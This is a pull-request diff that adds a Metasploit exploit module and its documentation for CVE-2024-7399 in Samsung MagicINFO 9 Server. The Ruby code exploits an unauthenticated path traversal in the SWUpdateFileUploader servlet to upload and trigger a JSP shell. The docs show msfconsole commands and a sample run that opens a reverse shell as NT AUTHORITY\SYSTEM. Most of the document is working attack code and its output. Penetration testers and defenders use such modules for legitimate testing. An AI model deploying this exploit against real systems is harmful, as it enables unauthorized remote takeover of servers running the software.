Land rapid7#20188, adds module for CVE-2024-7399 Samsung MagicINFO 9 Server

Samsung MagicINFO 9 Server RCE (CVE-2024-7399) Module

Author: msutovsky-r7

documentation/modules/exploit/windows/http/magicinfo_traversal.md

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a path traversal vulnerability in Samsung MagicINFO 9 <= 21.1050.0 (CVE-2024-7399).
+
+Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+which can be queried by an unauthenticated user to upload a JSP shell.
+By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT
+AUTHORITY\SYSTEM.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://www.samsung.com/us/business/solutions/digital-signage-solutions/magicinfo/).
+
+**Successfully tested on**
+
+- MagicINFO 9 21.1040.2 on Windows 10 (22H2)
+
+## Verification Steps
+
+1. Install Postgres or MySQL
+2. Install the application
+3. Activate the license
+4. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/http/magicinfo_traversal 
+msf6 exploit(windows/http/magicinfo_traversal) > set RHOSTS <IP>
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+```
+
+You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
+
+## Options
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] MagicINFO version detected: MagicINFO 9 Server 21.1040.2
+[+] The target appears to be vulnerable.
+[*] Uploading payload...
+[*] Upload successful
+[*] Payload executed!
+[*] Command shell session 3 opened (192.168.137.204:4444 -> 192.168.137.230:50038) at 2025-05-14 17:36:47 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.3208]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\MagicInfo Premium\tomcat\bin>
+-----
+          
+
+C:\MagicInfo Premium\tomcat\bin>whoami
+whoami
+nt authority\system
+
+C:\MagicInfo Premium\tomcat\bin>
+```

modules/exploits/windows/http/magicinfo_traversal.rb

@@ -0,0 +1,120 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
+        'Description' => %q{
+          Remote Code Execution in Samsung MagicINFO 9 Server <= 21.1050.0.
+          Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+          which can be queried by an unauthenticated user to upload a JSP shell.
+          By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'SSD Secure Disclosure' # Discovery and PoC
+        ],
+        'References' => [
+          ['URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
+          ['URL', 'https://security.samsungtv.com/securityUpdates'],
+          ['CVE', '2024-7399'] # SVE-2024-50018
+        ],
+        'DisclosureDate' => '2025-04-30',
+        'DefaultOptions' => {
+          'RPORT' => 7002,
+          'SSL' => 'True'
+        },
+        'Platform' => [ 'windows' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Java Server Page', {
+              'Platform' => %w[win],
+              'Arch' => ARCH_JAVA
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => true,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI for the MagicInfo web interface', '/MagicInfo']),
+        OptInt.new('DEPTH', [true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 6])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'config.js')
+    })
+
+    return CheckCode::Unknown unless res&.code == 200
+
+    js_object = res.body.to_s[/window\.globalConfig = (\{.+\})/m, 1]
+
+    return CheckCode::Safe('Could not extract globalConfig object from response.') unless js_object
+
+    json_b = js_object.gsub(/'/, '"') # replace ' with " so that we can use JSON.parse on the response body
+    data = JSON.parse(json_b)
+
+    full_version = data.fetch('magicInfoFrontEndVersion', nil)
+    version = full_version[/Server\s+([\d.]+)/, 1]
+
+    return CheckCode::Unknown unless version
+
+    unless Rex::Version.new(version) > Rex::Version.new('21.1050.0')
+      vprint_status("MagicINFO version detected: #{full_version}")
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    print_status('Uploading shell...')
+
+    shell = Rex::Text.rand_text_alpha(8..12)
+    traversal = '../' * datastore['DEPTH']
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/plain',
+      'data' => cmd,
+      'uri' => normalize_uri(target_uri.path, 'servlet', "SWUpdateFileUploader?fileName=./#{traversal}server/#{shell}.jsp")
+    })
+
+    if res&.code == 200
+      print_good('Upload successful.')
+      res1 = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, "#{shell}.jsp"),
+        'method' => 'GET'
+      })
+
+      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1&.code == 200
+      print_status('Payload executed!')
+
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload.')
+    end
+  end
+end